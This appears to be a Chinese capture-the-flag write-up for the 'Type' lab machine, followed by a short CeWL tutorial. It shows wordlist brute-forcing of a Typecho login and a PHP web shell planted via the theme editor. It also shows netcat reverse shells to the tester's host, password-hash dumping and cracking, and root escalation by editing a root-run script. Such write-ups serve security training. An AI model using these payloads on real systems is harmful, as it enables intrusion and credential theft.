<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="123cewl http:&#x2F;&#x2F;type.dsz &gt; pass.txtcat pass.txtcat pass.txt|grep &#x27;^[A-Z]&#x27; &gt; pass2.txt   http:&#x2F;&#x2F;type.dsz&#x2F;index.php&#x2F;author&#x2F;1&#x2F;用户名 123adminsburroplugugly   payload1  payload2  burp爆破发现用户密码">
<meta property="og:type" content="article">
<meta property="og:title" content="Type">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="123cewl http:&#x2F;&#x2F;type.dsz &gt; pass.txtcat pass.txtcat pass.txt|grep &#x27;^[A-Z]&#x27; &gt; pass2.txt   http:&#x2F;&#x2F;type.dsz&#x2F;index.php&#x2F;author&#x2F;1&#x2F;用户名 123adminsburroplugugly   payload1  payload2  burp爆破发现用户密码">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227093556.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227093628.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227093800.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227093824.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227093842.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227094215.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227094149.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227094402.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227094555.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227095102.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227095743.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227112558.png">
<meta property="article:published_time" content="2026-05-01T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-02T16:56:09.201Z">
<meta property="article:author" content="zhaochoudecat">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhaochoudecat.github.io/assets/Type/Pasted%20image%2020260227093556.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Type</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
<meta name="generator" content="Hexo 8.1.1"></head>

<body>
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/React/"><i class="fa fa-chevron-left" aria-hidden="true" onmouseover='$("#i-prev").toggle();' onmouseout='$("#i-prev").toggle();'></i></a></li>
        
        
        <li><a class="icon" href="/2026/05/02/%E9%9D%B6%E6%9C%BA/vulnhub/Game-of-Thrones/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover='$("#i-next").toggle();' onmouseout='$("#i-next").toggle();'></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover='$("#i-top").toggle();' onmouseout='$("#i-top").toggle();'></i></a></li>
        <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover='$("#i-share").toggle();' onmouseout='$("#i-share").toggle();' onclick='$("#share").toggle();return false;'></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&text=Type"><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&is_video=false&description=Type"><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Type&body=Check out this article: https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&title=Type"><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/05/02/%E9%9D%B6%E6%9C%BA/QQGroup/Type/&name=Type&description="><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%99%BB%E5%BD%95"><span class="toc-number">1.</span> <span class="toc-text">登录</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E5%85%A5%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.1.</span> <span class="toc-text">写入木马</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9B%E5%85%A5shell%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">进入shell分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssh"><span class="toc-number">3.</span> <span class="toc-text">ssh</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CEWL%EF%BC%9ACTF-%E4%B8%AD%E5%BF%85%E5%A4%87%E7%9A%84%E5%AF%86%E7%A0%81%E5%AD%97%E5%85%B8%E7%94%9F%E6%88%90%E5%B7%A5%E5%85%B7"><span class="toc-number">4.</span> <span class="toc-text">CEWL：CTF 中必备的密码字典生成工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E5%8A%9F%E8%83%BD%E4%B8%8E%E5%8E%9F%E7%90%86"><span class="toc-number">4.1.</span> <span class="toc-text">核心功能与原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CTF%E4%B8%AD%E7%9A%84%E5%85%B8%E5%9E%8B%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="toc-number">4.2.</span> <span class="toc-text">CTF中的典型应用场景</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E4%BD%BF%E7%94%A8%E7%A4%BA%E4%BE%8B"><span class="toc-number">4.3.</span> <span class="toc-text">基础使用示例</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E5%9C%A8CTF%E4%B8%AD%E9%87%8D%E8%A6%81"><span class="toc-number">4.4.</span> <span class="toc-text">为什么在CTF中重要</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index width mx-auto px2 my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Type
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">zhaochoudecat</span>
      </span>
      
    <div class="postdate">
        <time datetime="2026-05-01T16:00:00.000Z" itemprop="datePublished">2026-05-02</time>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cewl http://type.dsz &gt; pass.txt</span><br><span class="line"><span class="built_in">cat</span> pass.txt</span><br><span class="line"><span class="built_in">cat</span> pass.txt|grep <span class="string">&#x27;^[A-Z]&#x27;</span> &gt; pass2.txt</span><br></pre></td></tr></table></figure>

<p><img src="/assets/Type/Pasted%20image%2020260227093556.png"><br><img src="/assets/Type/Pasted%20image%2020260227093628.png"></p>
<p><a target="_blank" rel="noopener" href="http://type.dsz/index.php/author/1/">http://type.dsz/index.php/author/1/</a><br>用户名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">admin</span><br><span class="line">sburro</span><br><span class="line">plugugly</span><br></pre></td></tr></table></figure>
<p><img src="/assets/Type/Pasted%20image%2020260227093800.png"><br><img src="/assets/Type/Pasted%20image%2020260227093824.png"><br><img src="/assets/Type/Pasted%20image%2020260227093842.png"></p>
<ul>
<li><p>payload1<br><img src="/assets/Type/Pasted%20image%2020260227094215.png"></p>
</li>
<li><p>payload2<br><img src="/assets/Type/Pasted%20image%2020260227094149.png"></p>
</li>
<li><p>burp爆破发现用户密码<br>  name&#x3D;sburro<br>  password&#x3D;DevNotes<br><img src="/assets/Type/Pasted%20image%2020260227094402.png"></p>
</li>
</ul>
<h2 id="登录"><a href="#登录" class="headerlink" title="登录"></a>登录</h2><p><img src="/assets/Type/Pasted%20image%2020260227094555.png"><br>发现管理标题 有串密钥，推测是管理员密码 <code>2DbYCYpXwvV9kKwO</code></p>
<h3 id="写入木马"><a href="#写入木马" class="headerlink" title="写入木马"></a>写入木马</h3><ul>
<li>控制台-外观</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">exec</span>(<span class="variable">$_GET</span>[<span class="number">0</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="/assets/Type/Pasted%20image%2020260227095102.png"></p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://type.dsz/?0= busybox nc 192.168.43.16 -e /bin/sh</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://www.doubao.com/thread/w22e6a59aec28a8a7">https://www.doubao.com/thread/w22e6a59aec28a8a7</a><br><img src="/assets/Type/Pasted%20image%2020260227095743.png"><br>由于只有sh解释器，这里稳定脚本语句如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">python3 -c <span class="string">&quot;import pty;pty.spawn(&#x27;/bin/sh&#x27;);&quot;</span></span><br><span class="line">Ctrl+Z <span class="comment">#手动按键盘</span></span><br><span class="line"><span class="built_in">stty</span> raw -<span class="built_in">echo</span>; <span class="built_in">fg</span> </span><br><span class="line">reset</span><br><span class="line"><span class="built_in">stty</span> rows 29 columns 112</span><br><span class="line"><span class="built_in">export</span> TERM=xterm </span><br></pre></td></tr></table></figure>

<h2 id="进入shell分析"><a href="#进入shell分析" class="headerlink" title="进入shell分析"></a>进入shell分析</h2><ul>
<li>发现user.txt，还有个.hint提示</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">/home/plugugly $ <span class="built_in">ls</span> -la</span><br><span class="line">total 16</span><br><span class="line">drwxr-sr-x    2 plugugly plugugly      4096 Feb 23 10:43 .</span><br><span class="line">drwxr-xr-x    3 root     root          4096 Feb 22 23:25 ..</span><br><span class="line">lrwxrwxrwx    1 root     plugugly         9 Feb 23 10:43 .ash_history -&gt; /dev/null</span><br><span class="line">-rw-r--r--    1 root     plugugly       111 Feb 23 10:42 .hint</span><br><span class="line">-rw-r--r--    1 root     plugugly        44 Feb 22 23:25 user.txt</span><br><span class="line">/home/plugugly $ <span class="built_in">cat</span> user.txt </span><br><span class="line">flag&#123;user-f1315ee82308853cc1a9402f2cfa6d1c&#125;</span><br><span class="line">/home/plugugly $ <span class="built_in">cat</span> .hint </span><br><span class="line">Can<span class="string">&#x27;t type fast enough? Maybe the system stat bar has a hidden &#x27;</span>Debug Mode<span class="string">&#x27;. Try to knock on it several times.</span></span><br></pre></td></tr></table></figure>

<p>发现有database, 是SQLite</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">/data $ <span class="built_in">ls</span> -la</span><br><span class="line">total 20</span><br><span class="line">drwxr-xr-x    5 root     root          4096 Feb 22 23:19 .</span><br><span class="line">drwxr-xr-x   22 root     root          4096 Feb 23 10:56 ..</span><br><span class="line">drwxr-xr-x    2 root     root          4096 Feb 22 23:19 certs</span><br><span class="line">drwxrwxrwx    2 root     root          4096 Feb 27 09:57 database</span><br><span class="line">drwxrwxrwx    6 root     root          4096 Feb 23 00:00 typecho</span><br><span class="line">/data $ <span class="built_in">cd</span> database/</span><br><span class="line">/data/database $ <span class="built_in">ls</span></span><br><span class="line">typecho.db</span><br><span class="line">/data/database $ <span class="built_in">ls</span> -la</span><br><span class="line">total 112</span><br><span class="line">drwxrwxrwx    2 root     root          4096 Feb 27 09:57 .</span><br><span class="line">drwxr-xr-x    5 root     root          4096 Feb 22 23:19 ..</span><br><span class="line">-rw-r--r--    1 nobody   nobody      102400 Feb 27 09:57 typecho.db</span><br><span class="line">/data/database $ file typecho.db </span><br><span class="line">typecho.db: SQLite 3.x database, last written using SQLite version 3049002, file counter 382, database pages 25, cookie 0x13, schema 4, UTF-8, version-valid-for 382</span><br></pre></td></tr></table></figure>

<p>访问sqlite</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">/data/database $ sqlite3 typecho.db </span><br><span class="line">SQLite version 3.49.2 2025-05-07 10:39:52</span><br><span class="line">Enter <span class="string">&quot;.help&quot;</span> <span class="keyword">for</span> usage hints.</span><br><span class="line">sqlite&gt; .tables</span><br><span class="line">typecho_comments       typecho_metas          typecho_users        </span><br><span class="line">typecho_contents       typecho_options      </span><br><span class="line">typecho_fields         typecho_relationships</span><br><span class="line">sqlite&gt; <span class="keyword">select</span> * from typecho_users</span><br><span class="line">   ...&gt; ;</span><br><span class="line">1|admin|$P<span class="variable">$B</span>/xZAkZ342fLS1sEQwQfsXTVKiBnVG/|admin@type.dsz|http://type.dsz/|admin|1771773701|1772157442|1771815254|administrator|6f9308b9c68ffc22516422bd5b9a32e3</span><br><span class="line">2|sburro|$P<span class="variable">$BfS2sY4Vz6sHjC52095jVAFOjMNyuy1</span>|sburro@type.dsz||sburro|1771774529|1772156834|1771775693|contributor|ae834465efedeb9b6a3b333f321452e2</span><br><span class="line">3|plugugly|$P<span class="variable">$BuyKfLj9xZ0iLez6SomJNOLGx</span>.7g.U/|plugugly@type.dsz||plugugly|1771812079|0|0|subscriber|</span><br><span class="line">sqlite&gt; </span><br></pre></td></tr></table></figure>

<p>因为home下有plugugly用户，所以关注这个用户的hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/data/database $ cd /home</span><br><span class="line">/home $ ls </span><br><span class="line">plugugly</span><br></pre></td></tr></table></figure>

<p>破解hash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">☁  <span class="built_in">type</span>  <span class="built_in">echo</span> <span class="string">&#x27;$P$BuyKfLj9xZ0iLez6SomJNOLGx.7g.U/&#x27;</span> &gt; <span class="built_in">hash</span></span><br><span class="line">☁  <span class="built_in">type</span>  <span class="built_in">cat</span> <span class="built_in">hash</span>                    </span><br><span class="line">$P<span class="variable">$BuyKfLj9xZ0iLez6SomJNOLGx</span>.7g.U/</span><br><span class="line">☁  <span class="built_in">type</span>  john --wordlist=/usr/share/wordlists/rockyou.txt <span class="built_in">hash</span></span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password <span class="built_in">hash</span> (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])</span><br><span class="line">Cost 1 (iteration count) is 8192 <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Will run 4 OpenMP threads</span><br><span class="line">Press <span class="string">&#x27;q&#x27;</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">2boobies         (?)     </span><br><span class="line">1g 0:00:00:03 DONE (2026-02-27 10:49) 0.3289g/s 32463p/s 32463c/s 32463C/s Dominic1..221180</span><br><span class="line">Use the <span class="string">&quot;--show --format=phpass&quot;</span> options to display all of the cracked passwords reliably</span><br><span class="line">Session completed. </span><br><span class="line">☁  <span class="built_in">type</span>  john --show <span class="built_in">hash</span>                                     </span><br><span class="line">?:2boobies</span><br><span class="line"></span><br><span class="line">1 password <span class="built_in">hash</span> cracked, 0 left</span><br></pre></td></tr></table></figure>

<p><code>ssh的用户密码 plugugly  2boobies</code></p>
<h2 id="ssh"><a href="#ssh" class="headerlink" title="ssh"></a>ssh</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Type:~$ <span class="built_in">sudo</span> -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> plugugly on Type:</span><br><span class="line">    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY</span><br><span class="line"></span><br><span class="line">Runas and Command-specific defaults <span class="keyword">for</span> plugugly:</span><br><span class="line">    Defaults!/usr/sbin/visudo env_keep+=<span class="string">&quot;SUDO_EDITOR EDITOR VISUAL&quot;</span></span><br><span class="line"></span><br><span class="line">User plugugly may run the following commands on Type:</span><br><span class="line">    (ALL) NOPASSWD: /root/typer.py</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">export XAUTHORITY=/home/plugugly/.Xauthority</span><br><span class="line">sudo /root/typer.py</span><br></pre></td></tr></table></figure>

<p><img src="/assets/Type/Pasted%20image%2020260227112558.png"></p>
<p>给cleanup_scores.sh加上反弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Type:/usr/local/bin$ ls</span><br><span class="line">cleanup_scores.sh</span><br><span class="line">Type:/usr/local/bin$ cat cleanup_scores.sh </span><br><span class="line">#!/bin/sh</span><br><span class="line">busybox nc 192.168.43.16 1111 -e /bin/sh</span><br><span class="line">echo &#x27;Cleanup process started by root...&#x27;</span><br></pre></td></tr></table></figure>


<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">☁  ~  nc -lvnp 1111</span><br><span class="line">listening on [any] 1111 ...</span><br><span class="line"><span class="built_in">id</span></span><br><span class="line">connect to [192.168.43.16] from (UNKNOWN) [192.168.43.196] 41601</span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)</span><br><span class="line"><span class="built_in">cd</span> /usr</span><br><span class="line"><span class="built_in">ls</span></span><br><span class="line">linpeas.sh</span><br><span class="line">user.txt</span><br><span class="line"><span class="built_in">cd</span> /root</span><br><span class="line"><span class="built_in">ls</span></span><br><span class="line">root.txt</span><br><span class="line">typer.py</span><br><span class="line"><span class="built_in">cat</span> root.txt</span><br><span class="line">flag&#123;root-e0d46f8ca8c65edb6b7d46daeafebe16&#125;</span><br></pre></td></tr></table></figure>
<h1 id="CEWL：CTF-中必备的密码字典生成工具"><a href="#CEWL：CTF-中必备的密码字典生成工具" class="headerlink" title="CEWL：CTF 中必备的密码字典生成工具"></a>CEWL：CTF 中必备的密码字典生成工具</h1><p><strong>CEWL（发音为”cool”）是Custom Word List generator（自定义单词列表生成器）的缩写</strong>，是一款在CTF（Capture The Flag）夺旗赛中广泛使用的密码字典生成工具，默认集成于Kali Linux等渗透测试系统中。</p>
<hr>
<h3 id="核心功能与原理"><a href="#核心功能与原理" class="headerlink" title="核心功能与原理"></a>核心功能与原理</h3><p>CEWL本质是一个网络爬虫，它通过以下方式生成定制化密码字典：</p>
<ol>
<li><p>爬行指定URL到设定深度，提取网站内容中的单词</p>
</li>
<li><p>可选择跟随外部链接，扩大爬取范围</p>
</li>
<li><p>收集页面中mailto链接里的电子邮件地址（可用作用户名）</p>
</li>
<li><p>生成仅包含目标网站特有词汇的字典，而非通用字典</p>
</li>
</ol>
<h3 id="CTF中的典型应用场景"><a href="#CTF中的典型应用场景" class="headerlink" title="CTF中的典型应用场景"></a>CTF中的典型应用场景</h3><p>在CTF比赛中，CEWL主要用于：</p>
<ul>
<li><p><strong>Web登录爆破</strong>：生成目标网站专属字典，配合Hydra、ffuf等工具破解登录密码</p>
</li>
<li><p><strong>密码破解辅助</strong>：为John the Ripper、Hashcat等工具提供针对性字典</p>
</li>
<li><p><strong>社会工程学攻击</strong>：提取网站中的品牌名、产品名、员工姓名等信息，构建社工字典</p>
</li>
<li><p><strong>特定系统渗透</strong>：针对靶机网站生成符合其内容特点的密码字典，提高爆破成功率</p>
</li>
</ul>
<h3 id="基础使用示例"><a href="#基础使用示例" class="headerlink" title="基础使用示例"></a>基础使用示例</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 基础用法：爬取目标网站深度为3，生成字典</span></span><br><span class="line">cewl -d 3 -w custom_wordlist.txt https://target-website.com</span><br><span class="line"></span><br><span class="line"><span class="comment"># 收集电子邮件地址</span></span><br><span class="line">cewl -e -w emails.txt https://target-website.com</span><br><span class="line"></span><br><span class="line"><span class="comment"># 设置最小单词长度（如5个字符）</span></span><br><span class="line">cewl -m 5 -w long_words.txt https://target-website.com</span><br></pre></td></tr></table></figure>

<h3 id="为什么在CTF中重要"><a href="#为什么在CTF中重要" class="headerlink" title="为什么在CTF中重要"></a>为什么在CTF中重要</h3><p>CTF题目中的密码往往与目标系统&#x2F;网站内容相关，使用通用字典（如rockyou.txt）可能效率低下，而CEWL生成的<strong>目标专属字典</strong>能显著提高密码破解成功率，是渗透测试人员必备工具之一。</p>

  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%99%BB%E5%BD%95"><span class="toc-number">1.</span> <span class="toc-text">登录</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E5%85%A5%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.1.</span> <span class="toc-text">写入木马</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9B%E5%85%A5shell%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">进入shell分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssh"><span class="toc-number">3.</span> <span class="toc-text">ssh</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CEWL%EF%BC%9ACTF-%E4%B8%AD%E5%BF%85%E5%A4%87%E7%9A%84%E5%AF%86%E7%A0%81%E5%AD%97%E5%85%B8%E7%94%9F%E6%88%90%E5%B7%A5%E5%85%B7"><span class="toc-number">4.</span> <span class="toc-text">CEWL：CTF 中必备的密码字典生成工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E5%8A%9F%E8%83%BD%E4%B8%8E%E5%8E%9F%E7%90%86"><span class="toc-number">4.1.</span> <span class="toc-text">核心功能与原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CTF%E4%B8%AD%E7%9A%84%E5%85%B8%E5%9E%8B%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="toc-number">4.2.</span> <span class="toc-text">CTF中的典型应用场景</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E4%BD%BF%E7%94%A8%E7%A4%BA%E4%BE%8B"><span class="toc-number">4.3.</span> <span class="toc-text">基础使用示例</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E5%9C%A8CTF%E4%B8%AD%E9%87%8D%E8%A6%81"><span class="toc-number">4.4.</span> <span class="toc-text">为什么在CTF中重要</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
